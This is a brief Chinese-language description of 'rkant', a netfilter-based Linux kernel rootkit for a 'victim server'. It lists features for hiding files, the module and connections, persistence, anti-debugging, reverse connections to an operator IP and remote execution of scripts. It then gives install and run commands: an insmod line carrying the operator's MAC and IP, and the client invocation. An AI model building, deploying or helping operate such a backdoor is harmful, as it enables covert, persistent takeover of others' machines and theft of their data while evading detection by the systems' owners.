rootkit后门程序开发测试过程

rkant = rootkit ant，它是利用netfilter hook开发的一款linux后门rootkit程序。

rkant包括服务器端程序(on victim server)和客户端程序(on user client pc)，在ubuntu上面测试通过。
功能：
1、任意端口复用。端口复用，它就是在系统已经开放的端口上进行通讯，并且不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录，用linux工具无法查看到。防删除。
3、隐藏模块，开机启动，防发现。
4、反向连接。服务器定时连接指定的ip/port。
5、隐藏网络连接/端口，反调试，防止被跟踪和破解。内容加密传送。

rkant.ko设计要点：
1、安装时，会隐藏式启动一个后门进程（antclient)。
2、在内核空间中尝试向指定的pc机（模块参数指定mac_addr/ip/port）发送探测消息，直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时，可传送需要执行的脚本比如sh /home/freeman/myspy.sh，这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后，rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息，比如myspy.sh的执行结果或是其它信息。

安装说明：
1.将rkant.ko/antclient放到server的home/freeman目录下面。
2.将antkeeper放到客户机上面，任何一个目录均可。

在server中，如果用的是eth1，那么，安装参数是：
insmod rootdoor.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8    //damc/dip是目标机（client pc)的mac和ip，它是虚拟机2

antkeeper运行方法：
./antkeeper 192.168.2.8 192.168.2.113    //第一个ip是本机的ip，第二个ip是server的ip。
如果拿不到server的ip，也就是说server只有内网IP，无公网IP。那第二个ip就不填，留空。